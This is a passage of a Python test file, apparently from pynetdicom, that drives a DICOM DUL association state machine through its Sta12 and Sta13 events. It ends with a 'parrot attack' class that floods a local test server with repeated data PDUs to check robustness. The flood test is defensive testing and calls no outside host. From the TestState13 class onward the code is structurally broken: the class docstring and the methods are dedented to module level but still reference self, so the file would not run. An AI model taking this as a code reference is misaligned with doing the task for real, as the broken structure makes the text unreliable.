        # Sta12 + Evt14 -> AR-4 -> Sta12
        # Evt14: Receive A-RELEASE (rsp) primitive from <local user>
        # AR-4: Issue A-RELEASE-RP PDU and start ARTIM
        commands = [
            ("send", a_associate_rq),
            ("recv", None),  # recv a-associate-rq
            ("recv", None),  # recv a-release-rq
            ("send", a_release_rq),  # collide
            ("send", a_release_rp),
            ("recv", None),  # recv a-release-rp
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)

        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        # Local A-RELEASE (rsp) -> AR-4 sends A-RELEASE-RP to the peer
        assoc.dul.send_pdu(self.get_release(True))
        scp.step()
        scp.step()
        scp.shutdown()

        assert fsm._transitions[:6] == [
            "Sta2",
            "Sta3",
            "Sta6",
            "Sta7",
            "Sta10",
            "Sta12",
        ]
        assert fsm._changes[:7] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta10", "Evt13", "AR-10"),
            ("Sta12", "Evt14", "AR-4"),
        ]
        assert fsm._events[:7] == [
            "Evt5",
            "Evt6",
            "Evt7",
            "Evt11",
            "Evt12",
            "Evt13",
            "Evt14",
        ]
        # AR-4's A-RELEASE-RP PDU (type 0x06)
        assert scp.handlers[0].received[2] == (
            b"\x06\x00\x00\x00\x00\x04\x00\x00\x00\x00"
        )

    def test_evt15(self):
        """Test Sta12 + Evt15."""
        # Sta12 + Evt15 -> AA-1 -> Sta13
        # Evt15: Receive A-ABORT (rq) primitive from <local user>
        # AA-1: Send A-ABORT PDU to <remote>, start ARTIM
        commands = [
            ("send", a_associate_rq),
            ("recv", None),  # recv a-associate-rq
            ("recv", None),  # recv a-release-rq
            ("send", a_release_rq),  # collide
            ("send", a_release_rp),
            ("recv", None),  # recv a-abort
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)

        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        # Local user aborts -> AA-1 sends A-ABORT to the peer
        assoc.dul.send_pdu(self.get_abort())
        scp.step()
        scp.step()
        scp.shutdown()

        assert fsm._transitions[:6] == [
            "Sta2",
            "Sta3",
            "Sta6",
            "Sta7",
            "Sta10",
            "Sta12",
        ]
        assert fsm._changes[:7] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta10", "Evt13", "AR-10"),
            ("Sta12", "Evt15", "AA-1"),
        ]
        assert fsm._events[:7] == [
            "Evt5",
            "Evt6",
            "Evt7",
            "Evt11",
            "Evt12",
            "Evt13",
            "Evt15",
        ]
        # AA-1's A-ABORT PDU: source 0x00 (user-initiated abort)
        assert scp.handlers[0].received[2] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00"
        )

    def test_evt16(self):
        """Test Sta12 + Evt16."""
        # Sta12 + Evt16 -> AA-3 -> Sta1
        # Evt16: Receive A-ABORT PDU from <remote>
        # AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
        commands = [
            ("send", a_associate_rq),
            ("recv", None),  # recv a-associate-rq
            ("recv", None),  # recv a-release-rq
            ("send", a_release_rq),  # collide
            ("send", a_release_rp),
            ("send", a_abort),  # trigger event
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)

        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        scp.step()
        scp.step()
        scp.shutdown()

        assert fsm._transitions[:6] == [
            "Sta2",
            "Sta3",
            "Sta6",
            "Sta7",
            "Sta10",
            "Sta12",
        ]
        assert fsm._changes[:7] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta10", "Evt13", "AR-10"),
            ("Sta12", "Evt16", "AA-3"),
        ]
        assert fsm._events[:7] == [
            "Evt5",
            "Evt6",
            "Evt7",
            "Evt11",
            "Evt12",
            "Evt13",
            "Evt16",
        ]

    def test_evt17(self):
        """Test Sta12 + Evt17."""
        # Sta12 + Evt17 -> AA-4 -> Sta1
        # Evt17: Receive TRANSPORT_CLOSED from <transport service>
        # AA-4: Issue A-P-ABORT primitive
        commands = [
            ("send", a_associate_rq),
            ("recv", None),  # recv a-associate-rq
            ("recv", None),  # recv a-release-rq
            ("send", a_release_rq),  # collide
            ("send", a_release_rp),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)

        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        scp.step()
        # Shutting down the server closes the transport -> Evt17
        scp.shutdown()

        # Give the DUL reactor time to notice the closed transport
        # NOTE(review): timing-based wait; could be flaky on a slow machine
        time.sleep(0.5)

        assert fsm._transitions[:6] == [
            "Sta2",
            "Sta3",
            "Sta6",
            "Sta7",
            "Sta10",
            "Sta12",
        ]
        assert fsm._changes[:7] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta10", "Evt13", "AR-10"),
            ("Sta12", "Evt17", "AA-4"),
        ]
        assert fsm._events[:7] == [
            "Evt5",
            "Evt6",
            "Evt7",
            "Evt11",
            "Evt12",
            "Evt13",
            "Evt17",
        ]

    def test_evt18(self):
        """Test Sta12 + Evt18."""
        # Sta12 + Evt18 -> <ignore> -> Sta12
        # Evt18: ARTIM timer expired from <local service>
        commands = [
            ("send", a_associate_rq),
            ("recv", None),  # recv a-associate-rq
            ("recv", None),  # recv a-release-rq
            ("send", a_release_rq),  # collide
            ("send", a_release_rp),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)

        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        # Force a fast ARTIM expiry to raise Evt18 while in Sta12
        assoc.dul.artim_timer.timeout = 0.05
        assoc.dul.artim_timer.start()
        # Wait long enough for the 0.05 s timer to fire and be processed
        time.sleep(0.5)
        scp.step()
        scp.shutdown()

        assert fsm._transitions[:6] == [
            "Sta2",
            "Sta3",
            "Sta6",
            "Sta7",
            "Sta10",
            "Sta12",
        ]
        assert fsm._changes[:7] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta10", "Evt13", "AR-10"),
        ]
        # Evt18 is logged but produces no state change in Sta12
        assert fsm._events[:7] == [
            "Evt5",
            "Evt6",
            "Evt7",
            "Evt11",
            "Evt12",
            "Evt13",
            "Evt18",
        ]

    def test_evt19(self):
        """Test Sta12 + Evt19."""
        # Sta12 + Evt19 -> AA-8 -> Sta13
        # Evt19: Received unrecognised or invalid PDU from <remote>
        # AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
        commands = [
            ("send", a_associate_rq),
            ("recv", None),  # recv a-associate-rq
            ("recv", None),  # recv a-release-rq
            ("send", a_release_rq),  # collide
            ("send", a_release_rp),
            ("send", b"\x08\x00\x00\x00\x00\x00\x00\x00"),  # trigger event
            ("recv", None),  # recv a-abort
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)

        assoc, fsm = self.get_acceptor_assoc()
        self.move_to_state(assoc, scp)
        scp.step()
        scp.step()
        scp.step()
        scp.shutdown()

        assert fsm._transitions[:6] == [
            "Sta2",
            "Sta3",
            "Sta6",
            "Sta7",
            "Sta10",
            "Sta12",
        ]
        assert fsm._changes[:7] == [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt11", "AR-1"),
            ("Sta7", "Evt12", "AR-8"),
            ("Sta10", "Evt13", "AR-10"),
            ("Sta12", "Evt19", "AA-8"),
        ]
        assert fsm._events[:7] == [
            "Evt5",
            "Evt6",
            "Evt7",
            "Evt11",
            "Evt12",
            "Evt13",
            "Evt19",
        ]
        # AA-8's A-ABORT PDU: source 0x02, reason 0x00 (DUL provider abort)
        assert scp.handlers[0].received[2] == (
            b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
        )
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState13(TestStateBase):
"""Tests for State 13: Waiting for connection closed."""
def move_to_state(self, assoc, scp):
    """Drive the requestor's FSM into Sta13 (awaiting connection close).

    The server immediately answers the A-ASSOCIATE-RQ with another
    A-ASSOCIATE-RQ, which in Sta5 triggers Evt6 -> AA-8 -> Sta13 (see the
    per-test ``_changes`` asserts).
    """

    def patch_neg_rq():
        """Override ACSE._negotiate_as_requestor"""
        # Only send the request; skip waiting on the negotiation response
        assoc.acse.send_request()

    assoc.acse._negotiate_as_requestor = patch_neg_rq

    orig_method = assoc.dul._is_transport_event

    def patch_xport_event():
        """Override DUL._is_transport_event to not close in Sta13."""
        # Keep the connection open in Sta13 so further PDUs can still be
        # fed to the FSM; delegate to the original handler otherwise
        if self.fsm.current_state == "Sta13":
            if assoc.dul.socket and assoc.dul.socket.ready:
                assoc.dul._read_pdu_data()
                return True
            return False
        return orig_method()

    assoc.dul._is_transport_event = patch_xport_event

    assoc.start()
    scp.step()
    scp.step()
    self.wait_on_state(assoc.dul.state_machine, "Sta13")
def test_evt01(self):
    """Test Sta13 + Evt1."""
    # Sta13 + Evt1 -> <ignore> -> Sta13
    # Evt1: A-ASSOCIATE (rq) primitive from <local user>
    commands = [
        ("recv", None),  # recv a-associate-rq
        ("send", a_associate_rq),  # Evt6 in Sta5 -> AA-8 -> Sta13
        ("exit", None),
    ]
    self.scp = scp = self.start_server(commands)

    self.move_to_state(self.assoc, scp)
    # Trigger Evt1; ignored in Sta13, so no new change is recorded
    self.assoc.dul.send_pdu(self.get_associate("request"))
    scp.step()
    scp.shutdown()

    # Close manually — move_to_state patched the DUL to keep it open
    self.assoc.dul.socket.close()

    assert self.fsm._changes[:3] == [
        ("Sta1", "Evt1", "AE-1"),
        ("Sta4", "Evt2", "AE-2"),
        ("Sta5", "Evt6", "AA-8"),
    ]
    assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
    assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt1"]
@pytest.mark.skip()
def test_evt02(self):
    """Test Sta13 + Evt2."""
    # Sta13 + Evt2 -> <ignore> -> Sta13
    # Evt2: Receive TRANSPORT_OPEN from <transport service>
    # Skipped: presumably Evt2 cannot be generated against an established
    # association from this harness — TODO(review): confirm.
    pass
def test_evt03(self):
    """Test Sta13 + Evt3."""
    # Sta13 + Evt3 -> AA-6 -> Sta13
    # Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
    # AA-6: Ignore PDU
    commands = [
        ("recv", None),  # recv a-associate-rq
        ("send", a_associate_rq),  # Evt6 in Sta5 -> AA-8 -> Sta13
        ("send", a_associate_ac),  # trigger Evt3 while in Sta13
        ("exit", None),
    ]
    self.scp = scp = self.start_server(commands)

    self.move_to_state(self.assoc, scp)
    scp.step()
    scp.step()
    scp.shutdown()

    # Close manually — move_to_state patched the DUL to keep it open
    self.assoc.dul.socket.close()

    # AA-6 records the event but stays in Sta13
    assert self.fsm._changes[:4] == [
        ("Sta1", "Evt1", "AE-1"),
        ("Sta4", "Evt2", "AE-2"),
        ("Sta5", "Evt6", "AA-8"),
        ("Sta13", "Evt3", "AA-6"),
    ]
    assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
    assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt3"]
def test_evt04(self):
    """Test Sta13 + Evt4."""
    # Sta13 + Evt4 -> AA-6 -> Sta13
    # Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
    # AA-6: Ignore PDU
    commands = [
        ("recv", None),  # recv a-associate-rq
        ("send", a_associate_rq),  # Evt6 in Sta5 -> AA-8 -> Sta13
        ("send", a_associate_rj),  # trigger Evt4 while in Sta13
        ("exit", None),
    ]
    self.scp = scp = self.start_server(commands)

    self.move_to_state(self.assoc, scp)
    scp.step()
    scp.step()
    scp.shutdown()

    # AA-6 records the event but stays in Sta13
    assert self.fsm._changes[:4] == [
        ("Sta1", "Evt1", "AE-1"),
        ("Sta4", "Evt2", "AE-2"),
        ("Sta5", "Evt6", "AA-8"),
        ("Sta13", "Evt4", "AA-6"),
    ]
    assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
    assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt4"]
@pytest.mark.skip()
def test_evt05(self):
    """Test Sta13 + Evt5."""
    # Sta13 + Evt5 -> <ignore> -> Sta13
    # Evt5: Receive TRANSPORT_INDICATION from <transport service>
    # Skipped: presumably Evt5 cannot be generated against an established
    # association from this harness — TODO(review): confirm.
    pass
def test_evt06(self):
    """Test Sta13 + Evt6."""
    # Sta13 + Evt6 -> AA-7 -> Sta13
    # Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
    # AA-7: Send A-ABORT PDU to <remote>
    commands = [
        ("recv", None),  # recv a-associate-rq
        ("send", a_associate_rq),  # Evt6 in Sta5 -> AA-8 -> Sta13
        ("send", a_associate_rq),  # trigger Evt6 while in Sta13
        ("recv", None),  # recv a-abort (AA-8)
        ("recv", None),  # recv a-abort (AA-7)
        ("exit", None),
    ]
    self.scp = scp = self.start_server(commands)

    self.move_to_state(self.assoc, scp)
    scp.step()
    scp.step()
    scp.step()
    scp.step()
    scp.shutdown()

    # Inspect the A-ABORT the AA-7 action sent to the peer
    pdu = A_ABORT_RQ()
    pdu.decode(scp.received[2])
    assert pdu.source == 2
    assert pdu.reason_diagnostic == 2

    assert self.fsm._changes[:4] == [
        ("Sta1", "Evt1", "AE-1"),
        ("Sta4", "Evt2", "AE-2"),
        ("Sta5", "Evt6", "AA-8"),
        ("Sta13", "Evt6", "AA-7"),
    ]
    assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
    assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt6"]
def test_evt07(self):
    """Test Sta13 + Evt7."""
    # Sta13 + Evt7 -> <ignore> -> Sta13
    # Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
    scp_commands = [
        ("recv", None),
        ("send", a_associate_rq),
        ("exit", None),
    ]
    self.scp = server = self.start_server(scp_commands)
    self.move_to_state(self.assoc, server)
    # The primitive is ignored in Sta13 - no new action is recorded
    self.assoc.dul.send_pdu(self.get_associate("accept"))
    server.step()
    server.shutdown()
    expected_changes = [
        ("Sta1", "Evt1", "AE-1"),
        ("Sta4", "Evt2", "AE-2"),
        ("Sta5", "Evt6", "AA-8"),
    ]
    assert self.fsm._changes[:3] == expected_changes
    assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
    assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt7"]
def test_evt08(self):
    """Test Sta13 + Evt8."""
    # Sta13 + Evt8 -> <ignore> -> Sta13
    # Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
    scp_commands = [
        ("recv", None),
        ("send", a_associate_rq),
        ("exit", None),
    ]
    self.scp = server = self.start_server(scp_commands)
    self.move_to_state(self.assoc, server)
    # The primitive is ignored in Sta13 - no new action is recorded
    self.assoc.dul.send_pdu(self.get_associate("reject"))
    server.step()
    server.shutdown()
    expected_changes = [
        ("Sta1", "Evt1", "AE-1"),
        ("Sta4", "Evt2", "AE-2"),
        ("Sta5", "Evt6", "AA-8"),
    ]
    assert self.fsm._changes[:3] == expected_changes
    assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
    assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt8"]
def test_evt09(self):
    """Test Sta13 + Evt9."""
    # Sta13 + Evt9 -> <ignore> -> Sta13
    # Evt9: Receive P-DATA primitive from <local user>
    scp_commands = [
        ("recv", None),
        ("send", a_associate_rq),
        ("exit", None),
    ]
    self.scp = server = self.start_server(scp_commands)
    self.move_to_state(self.assoc, server)
    # The primitive is ignored in Sta13 - no new action is recorded
    self.assoc.dul.send_pdu(self.get_pdata())
    server.step()
    server.shutdown()
    expected_changes = [
        ("Sta1", "Evt1", "AE-1"),
        ("Sta4", "Evt2", "AE-2"),
        ("Sta5", "Evt6", "AA-8"),
    ]
    assert self.fsm._changes[:3] == expected_changes
    assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
    assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt9"]
def test_evt10(self):
    """Test Sta13 + Evt10."""
    # Sta13 + Evt10 -> AA-6 -> Sta13
    # Evt10: Receive P-DATA-TF PDU from <remote>
    # AA-6: Ignore PDU
    scp_commands = [
        ("recv", None),
        ("send", a_associate_rq),
        ("send", p_data_tf),
        ("exit", None),
    ]
    self.scp = server = self.start_server(scp_commands)
    self.move_to_state(self.assoc, server)
    # One step per remaining scripted command (send P-DATA-TF, then exit)
    server.step()
    server.step()
    server.shutdown()
    expected_changes = [
        ("Sta1", "Evt1", "AE-1"),
        ("Sta4", "Evt2", "AE-2"),
        ("Sta5", "Evt6", "AA-8"),
        ("Sta13", "Evt10", "AA-6"),
    ]
    assert self.fsm._changes[:4] == expected_changes
    assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
    assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt10"]
def test_evt11(self):
    """Test Sta13 + Evt11."""
    # Sta13 + Evt11 -> <ignore> -> Sta13
    # Evt11: Receive A-RELEASE (rq) primitive from <local user>
    scp_commands = [
        ("recv", None),
        ("send", a_associate_rq),
        ("exit", None),
    ]
    self.scp = server = self.start_server(scp_commands)
    self.move_to_state(self.assoc, server)
    # The primitive is ignored in Sta13 - no new action is recorded
    self.assoc.dul.send_pdu(self.get_release(False))
    server.step()
    server.shutdown()
    expected_changes = [
        ("Sta1", "Evt1", "AE-1"),
        ("Sta4", "Evt2", "AE-2"),
        ("Sta5", "Evt6", "AA-8"),
    ]
    assert self.fsm._changes[:3] == expected_changes
    assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
    assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt11"]
def test_evt12(self):
    """Test Sta13 + Evt12."""
    # Sta13 + Evt12 -> AA-6 -> Sta13
    # Evt12: Receive A-RELEASE-RQ PDU from <remote>
    # AA-6: Ignore PDU
    scp_commands = [
        ("recv", None),
        ("send", a_associate_rq),
        ("send", a_release_rq),
        ("exit", None),
    ]
    self.scp = server = self.start_server(scp_commands)
    self.move_to_state(self.assoc, server)
    # One step per remaining scripted command (send RELEASE-RQ, then exit)
    server.step()
    server.step()
    server.shutdown()
    expected_changes = [
        ("Sta1", "Evt1", "AE-1"),
        ("Sta4", "Evt2", "AE-2"),
        ("Sta5", "Evt6", "AA-8"),
        ("Sta13", "Evt12", "AA-6"),
    ]
    assert self.fsm._changes[:4] == expected_changes
    assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
    assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt12"]
def test_evt13(self):
    """Test Sta13 + Evt13."""
    # Sta13 + Evt13 -> AA-6 -> Sta13
    # (the original comment said Sta1, but AA-6 ignores the PDU and the
    #  assertions below show the FSM remains in Sta13)
    # Evt13: Receive A-RELEASE-RP PDU from <remote>
    # AA-6: Ignore PDU
    commands = [
        ("recv", None),
        ("send", a_associate_rq),
        ("send", a_release_rp),
        ("exit", None),
    ]
    self.scp = scp = self.start_server(commands)
    self.move_to_state(self.assoc, scp)
    # One step per remaining scripted command after move_to_state
    scp.step()
    scp.step()
    scp.shutdown()
    assert self.fsm._changes[:4] == [
        ("Sta1", "Evt1", "AE-1"),
        ("Sta4", "Evt2", "AE-2"),
        ("Sta5", "Evt6", "AA-8"),
        ("Sta13", "Evt13", "AA-6"),
    ]
    assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
    assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt13"]
def test_evt14(self):
    """Test Sta13 + Evt14."""
    # Sta13 + Evt14 -> <ignore> -> Sta13
    # Evt14: Receive A-RELEASE (rsp) primitive from <local user>
    scp_commands = [
        ("recv", None),
        ("send", a_associate_rq),
        ("exit", None),
    ]
    self.scp = server = self.start_server(scp_commands)
    self.move_to_state(self.assoc, server)
    # The primitive is ignored in Sta13 - no new action is recorded
    self.assoc.dul.send_pdu(self.get_release(True))
    server.step()
    server.shutdown()
    expected_changes = [
        ("Sta1", "Evt1", "AE-1"),
        ("Sta4", "Evt2", "AE-2"),
        ("Sta5", "Evt6", "AA-8"),
    ]
    assert self.fsm._changes[:3] == expected_changes
    assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
    assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt14"]
def test_evt15(self):
    """Test Sta13 + Evt15."""
    # Sta13 + Evt15 -> <ignore> -> Sta13
    # Evt15: Receive A-ABORT (rq) primitive from <local user>
    scp_commands = [
        ("recv", None),
        ("send", a_associate_rq),
        ("exit", None),
    ]
    self.scp = server = self.start_server(scp_commands)
    self.move_to_state(self.assoc, server)
    # The primitive is ignored in Sta13 - no new action is recorded
    self.assoc.dul.send_pdu(self.get_abort())
    server.step()
    server.shutdown()
    expected_changes = [
        ("Sta1", "Evt1", "AE-1"),
        ("Sta4", "Evt2", "AE-2"),
        ("Sta5", "Evt6", "AA-8"),
    ]
    assert self.fsm._changes[:3] == expected_changes
    assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
    assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt15"]
def test_evt16(self):
    """Test Sta13 + Evt16."""
    # Sta13 + Evt16 -> AA-2 -> Sta1
    # Evt16: Receive A-ABORT PDU from <remote>
    # AA-2: Stop ARTIM, close connection
    scp_commands = [
        ("recv", None),
        ("send", a_associate_rq),
        ("send", a_abort),
        ("exit", None),
    ]
    self.scp = server = self.start_server(scp_commands)
    self.move_to_state(self.assoc, server)
    # One step per remaining scripted command (send A-ABORT, then exit)
    server.step()
    server.step()
    server.shutdown()
    expected_changes = [
        ("Sta1", "Evt1", "AE-1"),
        ("Sta4", "Evt2", "AE-2"),
        ("Sta5", "Evt6", "AA-8"),
        ("Sta13", "Evt16", "AA-2"),
    ]
    assert self.fsm._changes[:4] == expected_changes
    assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
    assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt16"]
def test_evt17(self):
    """Test Sta13 + Evt17."""
    # Sta13 + Evt17 -> AR-5 -> Sta1
    # Evt17: Receive TRANSPORT_CLOSED from <transport service>
    # AR-5: Stop ARTIM
    commands = [
        ("recv", None),
        ("send", a_associate_rq),
        ("exit", None),
    ]
    self.scp = scp = self.start_server(commands)
    self.move_to_state(self.assoc, scp)
    scp.step()
    scp.shutdown()
    # Server shutdown closes the connection; give the DUL reactor time
    # to see TRANSPORT_CLOSED and record the Evt17 transition
    time.sleep(0.5)
    assert self.fsm._changes[:4] == [
        ("Sta1", "Evt1", "AE-1"),
        ("Sta4", "Evt2", "AE-2"),
        ("Sta5", "Evt6", "AA-8"),
        ("Sta13", "Evt17", "AR-5"),
    ]
    assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
    assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt17"]
def test_evt18(self):
    """Test Sta13 + Evt18."""
    # Sta13 + Evt18 -> AA-2 -> Sta1
    # Evt18: ARTIM timer expired from <local service>
    # AA-2: Stop ARTIM, close connection
    commands = [
        ("recv", None),
        ("send", a_associate_rq),
        ("exit", None),
    ]
    self.scp = scp = self.start_server(commands)
    self.move_to_state(self.assoc, scp)
    # Use a very short ARTIM timeout, then wait long enough for it to
    # expire so the FSM sees Evt18 while in Sta13
    self.assoc.dul.artim_timer.timeout = 0.05
    self.assoc.dul.artim_timer.start()
    time.sleep(0.5)
    scp.step()
    scp.shutdown()
    assert self.fsm._changes[:4] == [
        ("Sta1", "Evt1", "AE-1"),
        ("Sta4", "Evt2", "AE-2"),
        ("Sta5", "Evt6", "AA-8"),
        ("Sta13", "Evt18", "AA-2"),
    ]
    assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
    assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt18"]
def test_evt19(self):
    """Test Sta13 + Evt19."""
    # Sta13 + Evt19 -> AA-7 -> Sta13
    # Evt19: Received unrecognised or invalid PDU from <remote>
    # AA-7: Send A-ABORT PDU to <remote>
    commands = [
        ("recv", None),
        ("send", a_associate_rq),
        # 0x08 is not a recognised PDU type -> triggers Evt19
        ("send", b"\x08\x00\x00\x00\x00\x00\x00\x00"),
        ("recv", None),  # collects the A-ABORT produced by AA-7
        ("recv", None),
        ("exit", None),
    ]
    self.scp = scp = self.start_server(commands)
    self.move_to_state(self.assoc, scp)
    # One step per remaining scripted command after move_to_state
    scp.step()
    scp.step()
    scp.step()
    scp.step()
    scp.shutdown()
    # Third PDU received by the server is the abort generated by AA-7;
    # source/reason values 2/2 are what AA-7 sets on the A-ABORT
    pdu = A_ABORT_RQ()
    pdu.decode(scp.received[2])
    assert pdu.source == 2
    assert pdu.reason_diagnostic == 2
    assert self.fsm._changes[:4] == [
        ("Sta1", "Evt1", "AE-1"),
        ("Sta4", "Evt2", "AE-2"),
        ("Sta5", "Evt6", "AA-8"),
        ("Sta13", "Evt19", "AA-7"),
    ]
    assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta13"]
    assert self.fsm._events[:4] == ["Evt1", "Evt2", "Evt6", "Evt19"]
class TestParrotAttack(TestStateBase):
    """Test a parrot attack on the association."""

    def test_requestor(self):
        """Flood the requestor with P-DATA-TF PDUs then release."""
        commands = [
            ("recv", None),
            ("send", a_associate_ac),
            ("send", p_data_tf),
            ("send", p_data_tf),
            ("send", p_data_tf),
            ("send", p_data_tf),
            ("send", p_data_tf),
            ("send", p_data_tf),
            ("send", p_data_tf),
            ("send", p_data_tf),
            ("send", a_release_rq),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        self.assoc.start()
        # One step per scripted command so the script runs to completion
        for ii in range(len(commands)):
            scp.step()
        scp.shutdown()
        # Eight DT-2 entries, one per scripted P-DATA-TF
        assert self.fsm._changes[:14] == [
            ("Sta1", "Evt1", "AE-1"),
            ("Sta4", "Evt2", "AE-2"),
            ("Sta5", "Evt3", "AE-3"),
            ("Sta6", "Evt10", "DT-2"),
            ("Sta6", "Evt10", "DT-2"),
            ("Sta6", "Evt10", "DT-2"),
            ("Sta6", "Evt10", "DT-2"),
            ("Sta6", "Evt10", "DT-2"),
            ("Sta6", "Evt10", "DT-2"),
            ("Sta6", "Evt10", "DT-2"),
            ("Sta6", "Evt10", "DT-2"),
            ("Sta6", "Evt12", "AR-2"),
            ("Sta8", "Evt14", "AR-4"),
            ("Sta13", "Evt17", "AR-5"),
        ]

    def test_acceptor(self):
        """Test hitting the acceptor with PDUs."""
        # Also a regression test for #120
        # C-ECHO-RQ
        # 80 total length
        echo_rq = (
            b"\x04\x00\x00\x00\x00\x4a"  # P-DATA-TF 74
            b"\x00\x00\x00\x46\x01"  # PDV Item 70
            b"\x03"  # PDV: 2 -> 69
            b"\x00\x00\x00\x00\x04\x00\x00\x00\x42\x00\x00\x00"  # 12 Command Group Length
            b"\x00\x00\x02\x00\x12\x00\x00\x00\x31\x2e\x32\x2e\x38"
            b"\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x31\x2e\x31\x00"  # 26
            b"\x00\x00\x00\x01\x02\x00\x00\x00\x30\x00"  # 10 Command Field
            b"\x00\x00\x10\x01\x02\x00\x00\x00\x01\x00"  # 10 Message ID
            b"\x00\x00\x00\x08\x02\x00\x00\x00\x01\x01"  # 10 Command Data Set Type
        )
        # Send associate request then c-echo requests then release request
        commands = [
            ("send", a_associate_rq),
            ("recv", None),
            ("send", echo_rq),
            ("recv", None),
            ("send", echo_rq),
            ("recv", None),
            ("send", echo_rq),
            ("recv", None),
            ("send", echo_rq),
            ("recv", None),
            ("send", echo_rq),
            ("recv", None),
            ("send", echo_rq),
            ("recv", None),
            ("send", echo_rq),
            ("recv", None),
            ("send", echo_rq),
            ("recv", None),
            ("send", echo_rq),
            ("recv", None),
            ("send", echo_rq),
            ("recv", None),
            ("send", echo_rq),
            ("recv", None),
            ("send", echo_rq),
            ("recv", None),
            ("send", a_release_rq),
            ("exit", None),
        ]
        self.scp = scp = self.start_server(commands)
        assoc, fsm = self.get_acceptor_assoc()
        assoc.start()
        # One step per scripted command so the script runs to completion
        for ii in range(len(commands)):
            scp.step()
        scp.shutdown()
        # Each C-ECHO-RQ yields a DT-2 (PDU in) / DT-1 (response out) pair
        assert [
            ("Sta1", "Evt5", "AE-5"),
            ("Sta2", "Evt6", "AE-6"),
            ("Sta3", "Evt7", "AE-7"),
            ("Sta6", "Evt10", "DT-2"),
            ("Sta6", "Evt9", "DT-1"),
            ("Sta6", "Evt10", "DT-2"),
            ("Sta6", "Evt9", "DT-1"),
            ("Sta6", "Evt10", "DT-2"),
            ("Sta6", "Evt9", "DT-1"),
            ("Sta6", "Evt10", "DT-2"),
